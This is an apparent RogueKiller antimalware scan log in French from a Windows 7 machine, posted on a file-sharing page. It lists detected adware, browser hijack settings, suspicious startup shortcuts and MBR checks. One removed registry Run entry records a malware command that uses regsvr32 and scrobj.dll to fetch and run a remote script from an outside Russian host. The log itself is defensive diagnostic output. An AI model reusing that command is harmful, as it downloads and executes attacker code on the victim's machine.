cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

ÿþRogueKiller V12.11.18.0 [Oct 2 2017] (Gratuit) par Adlice Software
email : http://www.adlice.com/fr/contact/
Remontées : https://forum.adlice.com
Site web : http://www.adlice.com/fr/download/roguekiller/
Blog : http://www.adlice.com/fr/

Système d'exploitation : Windows 7 (6.1.7601 Service Pack 1) 32 bits version
Démarré en : Mode normal
Utilisateur : MAXIPOWER [Administrateur]
Démarré depuis : C:\Program Files\RogueKiller\RogueKiller.exe
Mode : Suppression -- Date : 10/02/2017 22:04:15 (Durée : 00:38:12)
Commutateurs : -refid

¤¤¤ Processus : 0 ¤¤¤

¤¤¤ Registre : 7 ¤¤¤
[PUP.Gen0] HKEY_CLASSES_ROOT\CLSID\{3CCC052E-BDEE-408A-BEA7-90914EF2964B} (C:\Program Files\K-Lite Codec Pack\Filters\MP4Splitter.ax) -> Non sélectionné
[Suspicious.Path] HKEY_CLASSES_ROOT\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25} (C:\Users\MAXIPO~1\AppData\Local\Temp\HYD6AD4.tmp.1493416452\HTA\3rdparty\FS.ocx) -> Non sélectionné
[PUP.Gen0] HKEY_CLASSES_ROOT\CLSID\{61F47056-E400-43D3-AF1E-AB7DFFD4C4AD} (C:\Program Files\K-Lite Codec Pack\Filters\MP4Splitter.ax) -> Non sélectionné
[PUP.Gen0] HKEY_CLASSES_ROOT\CLSID\{E2B98EEA-EE55-4E9B-A8C1-6E5288DF785A} (C:\Program Files\K-Lite Codec Pack\Filters\MP4Splitter.ax) -> Non sélectionné
[PUP.DriverPack] HKEY_USERS\S-1-5-21-901991598-403117394-2660128224-1000\Software\drpsu -> Non sélectionné
[Mal.AppLockExploit] HKEY_USERS\S-1-5-21-901991598-403117394-2660128224-1000\Software\Microsoft\Windows\CurrentVersion\Run | COM+ : regsvr32 /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll -> Supprimé(e)
[PUM.Policies] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Non sélectionné

¤¤¤ Tâches : 0 ¤¤¤

¤¤¤ Fichiers : 6 ¤¤¤
[Suspicious.Path][Fichier] C:\Users\MAXIPOWER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H.lnk [LNK@] C:\Users\MAXIPOWER\AppData\Roaming\eeZzPtJn9Z.exe -> Supprimé(e)
[Suspicious.Path][Fichier] C:\Users\MAXIPOWER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I.lnk [LNK@] C:\Users\MAXIPOWER\AppData\Roaming\eeg2WsQOI8.exe -> Supprimé(e)
[Suspicious.Path][Fichier] C:\Users\MAXIPOWER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\y.lnk [LNK@] C:\Users\MAXIPOWER\AppData\Roaming\eeawUqOIC6.exe -> Supprimé(e)
[PUP.Gen1][Répertoire] C:\ProgramData\APN -> Supprimé(e)
[PUP.Gen1][Répertoire] C:\ProgramData\APN\APN-Stub -> Supprimé(e)
[PUP.Gen1][Répertoire] C:\ProgramData\APN -> ERROR [3]
[PUP.Gen3][Fichier] C:\Users\MAXIPOWER\AppData\Roaming\Mozilla\Firefox\Profiles\bf27h6ui.default\searchplugins\ask-web-search.xml -> Supprimé(e)

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Fichier Hosts : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Chargé) ¤¤¤

¤¤¤ Navigateurs web : 2 ¤¤¤
[PUM.HomePage][Firefox:Config] bf27h6ui.default : user_pref("browser.startup.homepage", "http://start.bramjnet.com/vb/"); -> Non sélectionné
[PUM.SearchEngine][Firefox:Config] bf27h6ui.default : user_pref("browser.search.selectedEngine", "Ask Web Search"); -> Non sélectionné

¤¤¤ Vérification MBR : ¤¤¤
+++++ PhysicalDrive0: Hitachi HTS545025B9A300 +++++
--- User ---
[MBR] 53a60881cee257021594ad6782e76bd5
[BSP] fcb8db2b35db6795b07676879cba146f : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 156900 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 321538048 | Size: 81474 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: SanDisk Cruzer Blade USB Device +++++
--- User ---
[MBR] 33a0f33fb7e7f518f64aedcb9dad35b0
[BSP] df4f83c1f72e36823a12b0dfc7617313 : Empty MBR Code
Partition table:
0 - [XXXXXX] FAT32 (0xb) [VISIBLE] Offset (sectors): 32 | Size: 7633 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] Cette demande n?est pas prise en charge. )


Publicité


Signaler le contenu de ce document

Publicité